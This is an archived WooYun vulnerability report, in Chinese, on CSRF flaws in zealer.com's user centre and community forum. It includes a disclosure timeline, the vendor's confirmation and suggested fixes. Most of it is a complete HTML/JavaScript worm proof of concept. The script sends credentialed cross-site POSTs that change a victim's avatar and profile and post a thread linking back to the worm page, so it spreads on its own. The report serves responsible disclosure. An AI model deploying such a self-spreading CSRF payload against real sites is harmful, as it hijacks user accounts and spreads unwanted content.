乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-04: 细节已通知厂商并且等待厂商处理中 2015-08-04: 厂商已经确认,细节仅向厂商公开 2015-08-14: 细节向核心白帽子及相关领域专家公开 2015-08-24: 细节向普通白帽子公开 2015-09-03: 细节向实习白帽子公开 2015-09-18: 细节向公众公开
hi,It's me again,zealer最近可好。
我就简单切入主题吧,最近开张了社区(http://plus.zealer.com/),那就要非常注意CSRF蠕虫了。互动越多,传播的威力就越大。经检查,用户中心(http://www.zealer.com/user?type=info)(http://plus.zealer.com/user)的各项敏感操作均无防御CSRF(如增加token或验证referer)。那么问题来了,如何利用社区互动的力量把CSRF攻击最大化?我简单编写了一个POC,请看:
<html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "http://www.zealer.com/user/reUpload", true); xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01"); xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body = "x=0&y=15.084&w=400.564&h=400.56399999999996&pid=331503"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); var xhr = new XMLHttpRequest(); xhr.open("POST", "http://www.zealer.com/user/post", true); xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01"); xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body = "description=i+love+zealer.(made+by+kevinchow)"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); var xhr = new XMLHttpRequest(); xhr.open("POST", "http://plus.zealer.com/sendPost/post", true); xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01"); xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = true; var body = "type=&title=%E3%80%8CZealer%E7%A7%91%E6%8A%80%E3%80%8D%E8%8E%B7%E5%BE%97%E4%B8%80%E5%8A%A0%E4%BA%8C%E4%BD%93%E9%AA%8C%E7%9A%84%E5%B0%8F%E8%B4%B4%E5%A3%AB&tags=0&content=%3Cp%3E%E6%88%91%E6%8A%8A%E5%AE%83%E6%94%BE%E5%9C%A8%E8%BF%99%E9%87%8C%E5%B8%96%E5%AD%90%E9%87%8C%E4%BA%86%EF%BC%8C%E8%AF%B7%E7%82%B9%E5%87%BB%EF%BC%9A%3Ca+href%3D%22http%3A%2F%2Fwww.kevinchow.cn%2Fcsrf1.html%22+target%3D%22_self%22+title%3D%22aaaaaaaaa%22%3Ehttp%3A%2F%2Fplus.zealer.com%2Fpost%2F1028%3C%2Fa%3E%3C%2Fp%3E&flag=user&postTAG=&postTest=&postID="; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body></html>
以上这段蠕虫脚本,模拟XMLHttpRequest提交表单到服务端,当用户访问该蠕虫脚本后,将自动修改其头像、简介、发一封帖子(内容包含这个蠕虫脚本的触发地址)。以下有一段演示gif:http://www.kevinchow.cn/images/Zealer_CSRF.gif
1、增加token校验;2、建立referer白名单。
危害等级:高
漏洞Rank:15
确认时间:2015-08-04 13:21
作者在当天攻击的同时我们已经在做漏洞修复了
暂无